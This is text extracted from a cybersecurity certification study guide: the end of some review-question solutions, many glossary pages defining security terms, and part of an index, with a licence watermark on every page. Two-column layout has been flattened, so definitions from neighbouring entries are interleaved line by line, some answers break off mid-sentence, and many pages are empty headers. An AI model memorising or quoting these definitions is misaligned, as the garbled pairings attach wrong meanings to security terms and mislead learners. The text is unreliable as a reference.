6. 6. This method of data protection is often associated with payment processing systems.
Tokenization. Tokenization replaces sensitive data (such as a credit card number) with a randomly generated
token while securely storing the original data in a separate location.
7. You take an incident report from a user trying to access a REPORT.docx file on a SharePoint site.
The file has been replaced by a REPORT.docx.QUARANTINE.txt file containing a policy violation
notice. What is the most likely cause?
This is typical of a data loss prevention (DLP) policy replacing a file involved in a policy violation with a
tombstone file.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
86
Review Activity: Importance of Personnel Policies
87
1. Your company has been the victim of several successful phishing attempts over the past year.
Attackers managed to steal credentials from these attacks and use them to compromise key
systems. What vulnerability contributed to the success of these social engineers, and why?
A lack of proper user training directly contributes to the success of social engineering attempts. Attackers
can easily trick users when those users are unfamiliar with the characteristics and ramifications of such
deception.
Employees have different levels of technical knowledge and different work priorities. This means that a "one
size fits all" approach to security training is impractical.
3. You are planning a security awareness program for a manufacturer. Is a pamphlet likely to be
3.
Using a diversity of training techniques will boost engagement and retention. Practical tasks, such as
phishing simulations, will give attendees more direct experience. Workshops or computer-based training will
make it easier to assess whether the training has been completed.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
botnet A group of hosts or devices that call list A document listing authorized
has been infected by a control program contacts for notification and
called a bot, which enables attackers to collaboration during a security incident.
exploit the hosts to mount attacks.
canonicalization attack An attack
bring your own device (BYOD) Security method where input characters are
framework and tools to facilitate use encoded in such a way as to evade
of personally owned devices to access vulnerable input validation measures.
corporate networks and data.
capacity planning A practice which
brute force attack A type of password involves estimating the personnel,
attack where an attacker uses an storage, computer hardware, software,
application to exhaustively try every and connection infrastructure resources
possible alphanumeric combination to required over some future period of
crack encrypted passwords. time.
buffer overflow An attack in which card cloning Making a copy of a
data goes past the boundary of the contactless access card.
destination buffer and begins to corrupt
cellular Standards for implementing
adjacent memory. This can allow the
data access over cellular networks are
attacker to crash the system or execute
implemented as successive generations.
arbitrary code.
For 2G (up to about 48 Kb/s) and 3G (up
bug bounty Reward scheme operated to about 42 Mb/s), there are competing
by software and web services vendors GSM and CDMA provider networks.
for reporting vulnerabilities. Standards for 4G (up to about 90 Mb/s)
and 5G (up to about 300 Mb/s) are
business continuity (BC) A collection of
developed under converged LTE
processes that enable an organization to
standards.
maintain normal business operations in
the face of some adverse event. centralized computing architecture
A model where all data processing and
business email compromise (BEC)
storage is performed in a single location.
An impersonation attack in which the
attacker gains control of an employee’s certificate chaining A method of
account and uses it to convince other validating a certificate by tracing each
employees to perform fraudulent actions. CA that signs the certificate, up through
the hierarchy to the root CA. Also
business impact analysis (BIA)
referred to as chain of trust.
Systematic activity that identifies
organizational risks and determines certificate revocation list (CRL) A list
their effect on ongoing, mission critical of certificates that were revoked before
operations. their expiration date.
business partnership agreement certificate signing request (CSR) A
(BPA) Agreement by two companies Base64 ASCII file that a subject sends to
to work together closely, such as a CA to get a certificate.
the partner agreements that large IT
certification An asset disposal
companies set up with resellers and
technique that relies on a third party to
solution providers.
use sanitization or destruction methods
cable lock Devices can be physically for data remnant removal, and provides
secured against theft using cable ties documentary evidence that the process
and padlocks. Some systems also is complete and successful.
feature lockable faceplates, preventing
chain of custody Record of handling
access to the power switch and
evidence from collection to presentation
removable drives.
in court to disposal.
caching engine A feature of many
change control The process by which
proxy servers that enables the servers
the need for change is recorded and
to retain a copy of frequently requested
approved.
web pages.
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
and policies to transfer data without Some frameworks are general in nature,
authorization or detection. while others are specific to industry or
technology types.
credential harvesting Social
engineering techniques for gathering dark web Resources on the Internet
valid credentials to use to gain that are distributed between
unauthorized access. anonymized nodes and protected from
general access by multiple layers of
credential replay An attack that uses a
encryption and routing.
captured authentication token to start
an unauthorized session without having dashboard A console presenting
to discover the plaintext password for selected information in an easily
an account. digestible format, such as a
visualization.
credentialed scan A scan that uses
credentials, such as usernames data acquisition In digital forensics,
and passwords, to take a deep dive the method and tools used to create a
during the vulnerability scan, which forensically sound copy of data from a
will produce more information while source device, such as system memory
auditing the network. or a hard disk.
crossover error rate A biometric data at rest Information that is
evaluation factor expressing the point primarily stored on specific media,
at which FAR and FRR meet, with a low rather than moving from one medium
value indicating better performance. to another.
cross-site request forgery (CSRF) A data breach When confidential or
malicious script hosted on the attacker’s private data is read, copied, or changed
site that can exploit a session started on without authorization. Data breach
another site in the same browser. events may have notification and
reporting requirements.
cross-site scripting (XSS) A malicious
script hosted on the attacker’s site or data classification The process of
coded in a link injected onto a trusted applying confidentiality and privacy
site designed to compromise clients labels to information.
browsing the trusted site, circumventing
data controller In privacy regulations,
the browser’s security model of trusted
the entity that determines why and how
zones.
personal data is collected, stored, and
cryptanalysis The science, art, and used.
practice of breaking codes and ciphers.
data custodian An individual who is
cryptographic primitive A single responsible for managing the system on
hash function, symmetric cipher, or which data assets are stored, including
asymmetric cipher. being responsible for enforcing access
control, encryption, and backup/
cryptography The science and practice
recovery measures.
of altering data to make it unintelligible
to unauthorized parties. data exfiltration The process by which
an attacker takes data that is stored
cryptominer Malware that hijacks
inside of a private network and moves it
computer resources to create
to an external network.
cryptocurrency.
data exposure A software vulnerability
cyber threat intelligence (CTI) The
where an attacker is able to circumvent
process of investigating, collecting,
access controls and retrieve confidential
analyzing, and disseminating
or sensitive data from the file system or
information about emerging threats and
database.
threat sources.
data historian Software that aggregates
cybersecurity framework (CSF)
and catalogs data from multiple sources
Standards, best practices, and guidelines
within an industrial control system.
for effective security risk management.
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
FTPS A type of FTP using TLS for per-user and per-computer settings
confidentiality. such as password policy, account
restrictions, firewall status, and so on.
full disk encryption (FDE) Encryption of
all data on a disk (including system files, guidelines Best practice
temporary files, and the pagefile) can recommendations and advice for
be accomplished via a supported OS, configuration items where detailed,
third-party software, or at the controller strictly enforceable policies and
level by the disk device itself. standards are impractical.
gap analysis An analysis that measures hacker Often used to refer to someone
the difference between the current and who breaks into computer systems or
desired states in order to help assess spreads viruses, ethical hackers prefer
the scope of work included in a project. to think of themselves as experts on and
explorers of computer security systems.
geofencing Security control that can
enforce a virtual boundary based on hacktivist A threat actor that is
real-world geography. motivated by a social issue or political
cause.
geographic dispersion A resiliency
mechanism where processing and hard authentication token An
data storage resources are replicated authentication token generated by
between physically distant sites. a cryptoprocessor on a dedicated
hardware device. As the token is never
geolocation The identification or
transmitted directly, this implements an
estimation of the physical location of an
ownership factor within a multifactor
object, such as a radar source, mobile
authentication scheme.
phone, or Internet-connected computing
device. hardening A process of making a host
or app configuration secure by reducing
Global Positioning System (GPS)
its attack surface, through running only
A means of determining a receiver’s
necessary services, installing monitoring
position on Earth based on information
software to protect against malware
received from orbital satellites.
and intrusions, and establishing a
governance Creating and monitoring maintenance schedule to ensure the
effective policies and procedures to system is patched to be secure against
manage assets, such as data, and software exploits.
ensure compliance with industry
hash-based message authentication
regulations and local, national, and
code (HMAC) A method used to verify
global legislation.
both the integrity and authenticity of a
governance board Senior executives message by combining a cryptographic
and external stakeholders with hash of the message with a secret key.
responsibility for setting strategy and
hashing A function that converts an
ensuring compliance.
arbitrary-length string input to a fixed-
governance committee Leaders length string output. A cryptographic
and subject matter experts with hash function does this in a way that
responsibility for defining policies, reduces the chance of collisions, where
procedures, and standards within a two different inputs produce the same
particular domain or scope. output.
group account A group account is a Health Insurance Portability and
collection of user accounts that is useful Accountability Act (HIPAA) US federal
when establishing file permissions law that protects the storage, reading,
and user rights because when many modification, and transmission of
individuals need the same level of personal healthcare data.
access, a group could be established
heat map In a Wi-Fi site survey, a
containing all the relevant users.
diagram showing signal strength and
group policy object (GPO) On a channel uitilization at different
Windows domain, a way to deploy locations.
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
heat map risk matrix A graphical table can access and understand using basic
indicating the likelihood and impact of viewer software, such as documents,
risk factors identified for a workflow, images, video, and audio.
project, or department for reference by
hybrid cloud A cloud deployment that
stakeholders.
uses both private and public elements.
heuristic A method that uses feature
hybrid password attack An attack that
comparisons and likenesses rather than
uses multiple attack methods, including
specific signature matching to identify
dictionary, rainbow table, and brute
whether the target of observation is
force attacks, when trying to crack a
malicious.
password.
high availability (HA) A metric that
identification The process by which
defines how closely systems approach
a user account (and its credentials) is
the goal of providing data availability
issued to the correct person. Sometimes
100% of the time while maintaining a
referred to as enrollment.
high level of system performance.
identity and access management
honeypot A host (honeypot), network
(IAM) A security process that provides
(honeynet), file (honeyfile), or credential/
identification, authentication, and
token (honeytoken) set up with the
authorization mechanisms for users,
purpose of luring attackers away from
computers, and other entities to work
assets of actual value and/or discovering
with organizational assets like networks,
attack strategies and weaknesses in the
operating systems, and applications.
security configuration.
identity provider In a federated
horizontal privilege escalation When
network, the service that holds the user
a user accesses or modifies specific
account and performs authentication.
resources that they are not entitled to.
IDS/IPS log A target for event data
host-based firewall A software
related to detection/prevention rules
application running on a single host
that have been configured for logging.
and designed to protect only that host.
IEEE 802.1X A standard for
host-based intrusion detection
encapsulating EAP communications
system (HIDS) A type of IDS that
over a LAN (EAPoL) or WLAN (EAPoW) to
monitors a computer system for
implement port-based authentication.
unexpected behavior or drastic changes
to the system’s state. impact The severity of the risk if
realized by factors such as the scope,
host-based intrusion prevention
value of the asset, or the financial
system (HIPS) Endpoint protection that
impacts of the event.
can detect and prevent malicious activity
via signature and heuristic pattern impersonation Social engineering
matching. attack where an attacker pretends to
be someone they are not.
hot site A fully configured alternate
processing site that can be brought implicit deny The basic principle of
online either instantly or very quickly security stating that unless something
after a disaster. has explicitly been granted access, it
should be denied access.
HTML5 VPN Using features of HTML5
to implement remote desktop/VPN impossible travel A potential
connections via browser software indicator of malicious activity where
(clientless). authentication attempts are made from
different geographical locations within a
human-machine interface (HMI) Input short timeframe.
and output controls on a PLC to allow
a user to configure and monitor the incident An event that interrupts
system. standard operations or compromises
security policy.
human-readable data Information
stored in a file type that human beings incident response lifecycle Procedures
and guidelines covering appropriate
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
a remote server. IMAP4 utilizes TCP port structure that is easy for both humans
number 143, while the secure version and machines to read and consume.
IMAPS uses TCP/993.
journaling A method used by file
internet of things (IoT) Devices that systems to record changes not yet made
can report state and configuration to the file system in an object called a
data and be remotely managed over IP journal.
networks.
jump server A hardened server that
Internet Protocol (IP) Network provides access to other hosts.
(Internet) layer protocol in the TCP/IP
Kerberos A single sign-on
suite providing packet addressing and
authentication and authorization service
routing for all higher-level protocols in
that is based on a time-sensitive, ticket-
the suite.
granting system.
Internet Protocol Security (IPSec)
key distribution center (KDC)
Network protocol suite used to secure
A component of Kerberos that
data through authentication and
authenticates users and issues tickets
encryption as the data travels across the
(tokens).
network or the Internet.
key encryption key (KEK) In storage
internet relay chat (IRC) A group
encryption, the private key that is used
communications protocol that enables
to encrypt the symmetric bulk media
users to chat, send private messages,
encryption key (MEK). This means that
and share files.
a user must authenticate to decrypt the
intrusion detection system (IDS) A MEK and access the media.
security appliance or software that
key exchange Any method by which
analyzes data from a packet sniffer to
cryptographic keys are transferred
identify traffic that violates policies or
among users, thus enabling the use
rules.
of a cryptographic algorithm.
intrusion prevention system (IPS)
key length Size of a cryptographic
A security appliance or software that
key in bits. Longer keys generally
combines detection capabilities with
offer better security, but key lengths
functions that can actively block
for different ciphers are not directly
attacks.
comparable.
IP Flow Information Export (IPFIX)
key management system In PKI,
Standards-based version of the Netflow
procedures and tools that centralize
framework.
generation and storage of cryptographic
isolation Removing or severely keys.
restricting communications paths to a
key risk indicator (KRI) The method
particular device or system.
by which emerging risks are identified
IT Infrastructure Library (ITIL) An IT and analyzed so that changes can be
best practice framework, emphasizing adopted to proactively avoid issues from
the alignment of IT Service Management occuring.
(ITSM) with business needs. ITIL was
key stretching A technique that
first developed in 1989 by the UK
strengthens potentially weak input for
government. ITIL 4 was released in 2019
cryptographic key generation, such as
and is now marketed by AXELOS.
passwords or passphrases created by
jailbreaking Removes the protective people, against brute force attacks.
seal and any OS-specific restrictions
keylogger Malicious software or
to give users greater control over the
hardware that can record user
device.
keystrokes.
JavaScript Object Notation (JSON)
kill chain A model developed by
A file format that uses attribute-value
Lockheed Martin that describes
pairs to define configurations in a
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
that a threat actor can exploit to add memory injection A vulnerability that a
malicious code to a package. threat actor can exploit to run malicious
code with the same privilege level as the
malware Software that serves a
vulnerable process.
malicious purpose, typically installed
without the user’s consent (or Message Digest Algorithm v5 (MD5) A
knowledge). cryptographic hash function producing a
128-bit output.
Mandatory Access Control (MAC) An
access control model where resources metadata Information stored or
are protected by inflexible, system- recorded as a property of an object,
defined rules. Resources (objects) state of a system, or transaction.
and users (subjects) are allocated a
microservice An independent, single-
clearance level (or label).
function module with well-defined and
maneuver In threat hunting, the lightweight interfaces and operations.
concept that threat actor and defender Typically this style of architecture allows
may use deception or counterattacking for rapid, frequent, and reliable delivery
strategies to gain positional advantage. of complex applications.
master service agreement (MSA) A missing logs A potential indicator of
contract that establishes precedence malicious activity where events or log
and guidelines for any business files are deleted or tampered with.
documents that are executed between
mission essential function (MEF)
two parties.
Business or organizational activity that
maximum tolerable downtime (MTD) is too critical to be deferred for anything
The longest period that a process can be more than a few hours, if at all.
inoperable without causing irrevocable
mobile device management (MDM)
business failure.
Process and supporting technologies for
mean time between failures (MTBF) tracking, controlling, and securing the
A metric for a device or component that organization’s mobile infrastructure.
predicts the expected time between
monitoring/asset tracking
failures.
Enumeration and inventory processes
mean time to repair/replace/recover and software that ensure physical and
(MTTR) A metric representing average data assets comply with configuration
time taken for a device or component and performance baselines, and have
to be repaired, replaced, or otherwise not been tampered with or suffered
recover from a failure. other unauthorized access.
Media Access Control filtering (MAC multi-cloud A cloud deployment model
filtering) Applying an access control list where the cloud consumer uses mutiple
to a switch or access point so that only public cloud services.
clients with approved MAC addresses
multifactor authentication (MFA) An
can connect to it.
authentication scheme that requires the
Memorandum of Agreement (MoA) user to present at least two different
A legal document forming the basis factors as credentials; for example,
for two parties to cooperate without something you know, something you
a formal contract (a cooperative have, something you are, something you
agreement). MOAs are often used by do, and somewhere you are. Specifying
public bodies. two factors is known as “2FA.”
memorandum of understanding nation state actor A type of threat
(MoU) Usually a preliminary or actor that is supported by the resources
exploratory agreement to express of its host country’s military and security
an intent to work together that is not services.
legally binding and does not involve the
National Institute of Standards and
exchange of money.
Technology (NIST) Develops computer
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
qualitative risk analysis The process recovery time objective (RTO) The
of determining the probability of maximum time allowed to restore a
occurrence and the impact of identified system after a failure event.
risks by using logical reasoning when
redundancy Overprovisioning
numeric data is not readily available.
resources at the component, host, and/
quantitative risk analysis A numerical or site level so that there is failover to
method that is used to assess the a working instance in the event of a
probability and impact of risk and problem.
measure the impact.
regulated data Information that has
questionnaires In vendor management, storage and handling compliance
structured means of obtaining requirements defined by national
consistent information, enabling more and state legislation and/or industry
effective risk analysis and comparison. regulations.
race condition A software vulnerability remote access Infrastructure,
when the resulting outcome from protocols, and software that allow a
execution processes is directly host to join a local network from a
dependent on the order and timing physically remote location, or that allow
of certain events, and those events a session on a host to be established
fail to execute in the order and timing over a network.
intended by the developer.
remote access Trojan (RAT) Malware
radio-frequency ID (RFID) A means of that creates a backdoor remote
encoding information into passive tags administration channel to allow a threat
which can be energized and read by actor to access and control the infected
radio waves from a reader device. host.
ransomware Malware that tries Remote Authentication Dial-in
to extort money from the victim User Service (RADIUS) AAA protocol
by blocking normal operation of a used to manage remote and wireless
computer and/or encrypting the victim’s authentication infrastructures.
files and demanding payment.
remote code execution (RCE) A
reaction time The elapsed time vulnerability that allows an attacker to
between an incident occurring and a transmit code from a remote host for
response being implemented. execution on a target host or a module
that exploits such a vulnerability.
real-time operating system (RTOS) A
type of OS that prioritizes deterministic Remote Desktop Protocol (RDP)
execution of operations to ensure Application protocol for operating
consistent response for time-critical remote connections to a host using a
tasks. graphical interface. The protocol sends
screen data from the remote host to
reconnaissance The actions taken to
the client and transfers mouse and
gather information about an individual’s
keyboard input from the client to the
or organization’s computer systems
remote host. It uses TCP port 3389.
and software. This typically involves
collecting information such as the types replay attack An attack where the
of systems and software used, user attacker intercepts some authentication
account information, data types, and data and reuses it to try to reestablish a
network configuration. session.
recovery An incident response process replication Automatically copying
in which hosts, networks, and systems data between two processing systems
are brought back to a secure baseline either simultaneously on both systems
configuration. (synchronous) or from a primary to a
secondary location (asynchronous).
recovery point objective (RPO) The
longest period that an organization can reporting A forensics process that
tolerate lost data being unrecoverable. summarizes significant contents of
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
digital data using open, repeatable, and risk Likelihood and impact (or
unbiased methods and tools. consequence) of a threat actor
exercising a vulnerability.
representational state transfer (REST)
A standardized, stateless architectural risk acceptance The response of
style used by web applications for determining that a risk is within
communication and integration. the organization’s appetite and no
countermeasures other than ongoing
reputational threat intelligence
monitoring is needed.
Blocklists of known threat sources,
such as malware signatures, IP address risk analysis Process for qualifying or
ranges, and DNS domains. quantifying the likelihood and impact of
a factor.
residual risk Risk that remains even
after controls are put into place. risk appetite A strategic assessment of
what level of residual risk is acceptable
resilience The ability of a system or
for an organization.
network to recover quickly from failure
events with no or minimal manual risk assessment The process of
intervention. identifying risks, analyzing them,
developing a response strategy for
resource consumption A potential
them, and mitigating their future impact.
indicator of malicious activity where
CPU, memory, storage, and/or network risk avoidance In risk mitigation, the
usage deviates from expected norms. practice of ceasing activity that presents
risk.
resource inaccessibility A potential
indicator of malicious activity where a risk deterrence In risk mitigation, the
file or service resource that should be response of deploying security controls
available is inaccessible. to reduce the likelihood and/or impact
of a threat scenario.
resources/funding The ability of threat
actors to draw upon funding to acquire risk exception Category of risk
personnel, tools, and to develop novel management that uses alternate
attack types. mitigating controls to control an
accepted risk factor.
responsibility matrix Identifies that
responsibility for the implementation risk exemption Category of risk
of security as applications, data, and management that accepts an
workloads are transitioned into a unmitigated risk factor.
cloud platform are shared between
risk identification Within overall risk
the customer and the cloud service
assessment, the specific process of
provider (CSP).
listing sources of risk due to threats and
responsible disclosure program vulnerabilities.
A process that allows researchers
risk management The cyclical process
and reviewers to safely disclose
of identifying, assessing, analyzing, and
vulnerabilities to a software
responding to risks.
developer.
risk mitigation The response
responsiveness The ability of a system
of reducing risk to fit within an
to process a task or workload within an
organization’s willingness to accept risk.
acceptable amount of time.
risk owner An individual who is
reverse proxy A type of proxy server
accountable for developing and
that protects servers from direct contact
implementing a risk response strategy
with client requests.
for a risk documented in a risk register.
right to be forgotten Principle of
risk register A document highlighting
regulated privacy data that protects
the results of risk assessments in an
the data subject’s ability to request its
easily comprehensible format (such as
deletion.
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
a “traffic light” grid). Its purpose is for salt A security countermeasure that
department managers and technicians mitigates the impact of precomputed
to understand risks associated with the hash table attacks by adding a random
workflows that they manage. value to (“salting”) each plaintext input.
risk reporting A periodic summary of sandbox A computing environment
relevant information about a project’s that is isolated from a host system
current risks. It provides a summarized to guarantee that the environment
overview of known risks, realized risks, runs in a controlled, secure fashion.
and their impact on the organization. Communication links between the
sandbox and the host are usually
risk threshold Boundary for types and/
completely prohibited so that malware
or levels of risk that can be accepted.
or faulty software can be analyzed in
risk tolerance Determines the isolation and without risk to the host.
thresholds that separate different levels
sanitization The process of thoroughly
of risk.
and completely removing data from a
risk transference In risk mitigation, storage medium so that file remnants
the response of moving or sharing the cannot be recovered.
responsibility of risk to another entity,
Sarbanes-Oxley Act (SOX) A
such as by purchasing cybersecurity
law enacted in 2002 that dictates
insurance.
requirements for the storage and
role-based access control (RBAC) An retention of documents relating to an
access control model where resources organization’s financial and business
are protected by ACLs that are managed operations.
by administrators and that provide
scalability Property by which a
user permissions based on job
computing environment is able to
functions.
gracefully fulfill its ever-increasing
root cause analysis A technique used resource needs.
to determine the true cause of the
screened subnet A segment isolated
problem that, when removed, prevents
from the rest of a private network by
the problem from occurring again.
one or more firewalls that accepts
root certificate authority In PKI, a CA connections from the Internet over
that issues certificates to intermediate designated ports.
CAs in a hierarchical structure.
Secure Access Service Edge (SASE) A
rooting Gaining superuser-level access networking and security architecture
over an Android-based mobile device. that provides secure access to cloud
router firewall A hardware device that applications and services while reducing
has the primary function of a router, but complexity. It combines security
also has firewall functionality embedded services like firewalls, identity and
into the router firmware. access management, and secure web
gateway with networking services such
rule-based access control A as SD-WAN.
nondiscretionary access control
technique that is based on a set of secure baseline Configuration guides,
operational rules or restrictions to benchmarks, and best practices for
enforce a least privileges permissions deploying and maintaining a network
policy. device or application server in a secure
state for its given role.
rules of engagement (ROE) A definition
of how a pen test will be executed and secure enclave CPU extensions that
what constraints will be in place. This protect data stored in system memory
provides the pen tester with guidelines so that an untrusted process cannot
to consult as they conduct their tests read it.
so that they don’t have to constantly Secure File Transfer Protocol (SFTP)
ask management for permission to do A secure version of the File Transfer
something. Protocol that uses a Secure Shell (SSH)
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
alerting service for faults such as high been discovered by normal security
temperature, chassis intrusion, and monitoring.
so on.
ticket granting ticket (TGT) In
system/process audit An audit process Kerberos, a token issued to an
with a wide scope, including assessment authenticated account to allow access
of supply chain, configuration, support, to authorized application servers.
monitoring, and cybersecurity factors.
timeline In digital forensics, a tool
tabletop exercise A discussion of that shows the sequence of file system
simulated emergency situations and events within a source image in a
security incidents. graphical format.
tactics, techniques, and procedures time-of-check to time-of-use
(TTP) Analysis of historical cyberattacks (TOCTOU) The potential vulnerability
and adversary actions. that occurs when there is a change
between when an app checked a
technical debt Costs accrued by
resource and when the app used the
keeping an ineffective system or product
resource.
in place, rather than replacing it with a
better-engineered one. time-of-day restrictions Policies or
configuration settings that limit a user’s
Temporal Key Integrity Protocol
access to resources.
(TKIP) The mechanism used in the first
version of WPA to improve the security tokenization A de-identification
of wireless encryption mechanisms, method where a unique token is
compared to the flawed WEP standard. substituted for real data.
test access point (TAP) A hardware trade secrets Intellectual property
device inserted into a cable run to copy that gives a company a competitive
frames for analysis. advantage but hasn’t been registered
with a copyright, trademark, or patent.
tethering Using the cellular data plan
of a mobile device to provide Internet transparent proxy A server that
access to a laptop or PC. The PC can redirects requests and responses
be tethered to the mobile by USB, without the client being explicitly
Bluetooth, or Wi-Fi (a mobile hotspot). configured to use it. Also referred
to as a forced or intercepting
third party CA In PKI, a public CA that
proxy.
issues certificates for multiple domains
and is widely trusted as a root trust by Transport Layer Security (TLS)
operating systems and browsers. Security protocol that uses certificates
for authentication and encryption to
third-party risks Vulnerabilities that
protect web communications and other
arise from dependencies in business
application protocols.
relationships with suppliers and
customers. Transport Layer Security virtual
private network (TLS VPN) Virtual
threat A potential for an entity to
private networking solution that uses
exercise a vulnerability (that is, to
digital certificates to identify, host, and
breach security).
establish secure tunnels for network
threat actor A person or entity traffic.
responsible for an event that has been
transport/communication encryption
identified as a security incident or as a
Encryption scheme applied to data-in-
risk.
motion, such as WPA, IPsec, or TLS.
threat feed Signatures and pattern-
trend analysis The process of detecting
matching rules supplied to analysis
patterns within a dataset over time,
platforms as an automated feed.
and using those patterns to make
threat hunting A cybersecurity predictions about future events
technique designed to detect the or to better understand past
presence of threats that have not events.
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Glossary
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
potential for unauthorized endpoint agents, 484 data subject, G-8, 475–476
access, 478 network agents, 484 data types, 470–471
public notification and policy server, 484 data type checks, 319
disclosure, 478–479 quarantine, 485 financial data, 471
data classifications, G-7, tombstone, 485 human-readable data, 471
472–473 data masking, G-8, 66 legal data, 471
confidential (secret) data, data owner, G-8, 423 non-human-readable data,
472 data planes, G-8 471
critical (top secret) data, in software defined regulated data, 470
472 networking, 152, 153 trade secrets, 471
private/personal data, in zero trust architectures, database encryption, G-8, 62,
472 165–167 481
proprietary information, data processor, G-8, 60, database management system
472 475–476, 482 (DBMS), 62
public (unclassified) data, data protection, 481–483 database mirroring, 178
472 authorities, 422 database-level encryption, 62
restricted data, 473 cloud security datacenter security, 416
sensitive data, 473 considerations, 156 Datagram TLS (DTLS), 132
solutions, S-25 data at rest, 481 data/media encryption key
data compliance, 479–480 data in transit, 482 (DEK/MEK), 278
assessments, 461 data in use, 482 DBMS. see database
contractual noncompliance, database encryption, management system (DBMS)
impacts of, 480 481 dcfldd, 343
monitoring, 481 encryption, 294 DCS. see distributed control
noncompliance, impacts of, methods, 482–483 system (DCS)
479 encryption, 482 dd command, G-8, 343
obligations, in rules of geographic restrictions, DDoS. see distributed DoS
engagement, 458 474, 482 (DDoS)
reporting, 480–481 hashing, 482 DDoS attacks. see distributed
scan, 366 masking, 482 denial of service (DDoS) attacks
software licensing, 480 obfuscation, 483 deadbolt lock, 201
solutions, S-25 permission restrictions, decentralized computing
vendor diversity and, 193 483 architecture, G-8, 147
zero trust architectures segmentation, 483 decentralized security
and, 164 tokenization, 483 governance, 421
data controller, G-7, 475–476 zero trust architectures, deception technologies, G-8,
data custodian, G-7, 423 164 194
data encryption key (DEK), 61 Data Protection Act 2018, 418 decommissioning, 289
Data Encryption Standard data retention, G-8, 477 DECT. see Digital Enhanced
(DES), 215 data sources, 347–357 Cordless Telecommunications
Data Execution Prevention application logs, 351 (DECT)
(DEP), 221, 400 automated reports, 348 deduplication, G-8, 345
data exfiltration, G-7, 18, 387 dashboards, 347–348 deep fake technology, 32
data exposure, G-7, 321 endpoint logs, 351 deep web, 237–238
data historian, G-7, 159 host operating system logs, default credentials, 26, 253
data in transit, G-8, 60, 482 349–350 defaults, changing, 288–289
data in use, G-8, 60, 482 log data, 348–349 defense and military
data inventories, G-8, 477 metadata, 355–356 organizations, 422
data loss prevention (DLP), G-8, network, 352–353 defense in depth, G-8, 108,
269, 313, 365, 484–485 packet captures, 354 115, 192, 193
alert only, 485 solutions, S-19 Defense Information Systems
block, 485 vulnerability scans, 352 Agency (DISA), 252
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Elliptic Curve DHE (ECDHE), 65, encryption, G-10, 482 social engineering, 281
306 algorithms, 38–42, 417 vulnerabilities, 281
Elliptic Curve DSA (ECDSA), 45 asymmetric, 41–42, weak configuration, 282
email, 27, 32 60–61 endpoint detection and
data loss prevention, cryptographic ciphers, response (EDR), G-10, 279–280
313 43–45 endpoint hardening, 274–276
encryption, 287, 294 digital signatures, 44 configuration baselines,
gateway, 312 hashing, 42–43 275–276
Internet header, 355 key length, 40–41 operating system security,
mail delivery agent, 355 substitution, 39 274–275
